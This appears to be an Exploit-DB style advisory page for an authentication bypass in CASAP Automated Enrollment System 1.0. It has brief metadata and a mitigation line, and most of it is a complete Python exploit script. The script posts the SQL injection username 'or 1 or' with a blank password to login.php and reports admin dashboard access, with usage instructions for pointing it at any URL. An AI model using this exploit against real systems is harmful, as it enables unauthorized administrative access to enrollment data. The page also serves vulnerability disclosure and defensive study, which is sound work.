CASAP Automated Enrollment System 1.0 - Authentication Bypass

vendor:

CASAP Automated Enrollment System

by:

Himanshu Shukla

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: CASAP Automated Enrollment System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:casap_automated_enrollment_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu + XAMPP 7.4.4

2021

CASAP Automated Enrollment System 1.0 – Authentication Bypass

CASAP Automated Enrollment System 1.0 is vulnerable to authentication bypass. An attacker can exploit this vulnerability by setting a cookie and sending a POST request with a username of 'or 1 or' and a blank password. If successful, the attacker will be able to access the dashboard without authentication.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.0
# Tested On: Ubuntu + XAMPP 7.4.4
# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi


#STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL>
# For Example: python3 exploit.py http://10.9.67.23/final/
#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser. 


import time
import sys
import requests


YELLOW =  '\033[33m' # Yellow Text
GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

print(YELLOW+'      _          ______  _               _  ___           ', RESET)
print(YELLOW+'  ___| |_ ___   / / ___|| |__   __ _  __| |/ _ \__      __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'|  __/ || (__ / /  ___) | | | | (_| | (_| | |_| |\ V  V / ', RESET)
print(YELLOW+' \___|\__\___/_/  |____/|_| |_|\__,_|\__,_|\___/  \_/\_/  ', RESET)
print(YELLOW+" ", RESET)                                                          
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!!!       CASAP AUTOMATED ENROLLMENT SYSTEM 1.0        !!!')
print('!!!               AUTHENTICATION BYPASS                !!!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')

print('Author - Himanshu Shukla')


def authbypass(url):

	#Authentication Bypass
	s = requests.Session() 
	#Set Cookie
	cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}


	print ("[*]Attempting Authentication Bypass...")
	time.sleep(1)

	values = {"username":"'or 1 or'","password":""}
	r=s.post(url+'login.php', data=values, cookies=cookies) 
	p=s.get(url+'dashboard.php', cookies=cookies) 

	#Check if Authentication was bypassed or not.
	logged_in = True if ("true_admin" in r.text) else False
	l=logged_in
	if l:
		print(GREEN+"[+]Authentication Bypass Successful!", RESET)
		print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET)
	else:
		print(RED+"[-]Failed To Authenticate!", RESET)
		print(RED+"[-]Check Your URL", RESET)


if __name__ == "__main__":


	if len(sys.argv)!=2:
		print(RED+"You Haven't Provided any URL!", RESET)
		print("Usage : python3 exploit.py <URL>")
		print("Example : python3 exploit.py http://10.9.7.3/final/")
		exit()

	try:

		authbypass(sys.argv[1])

	except:

		print(RED+"[-]Invalid URL!", RESET)
		exit()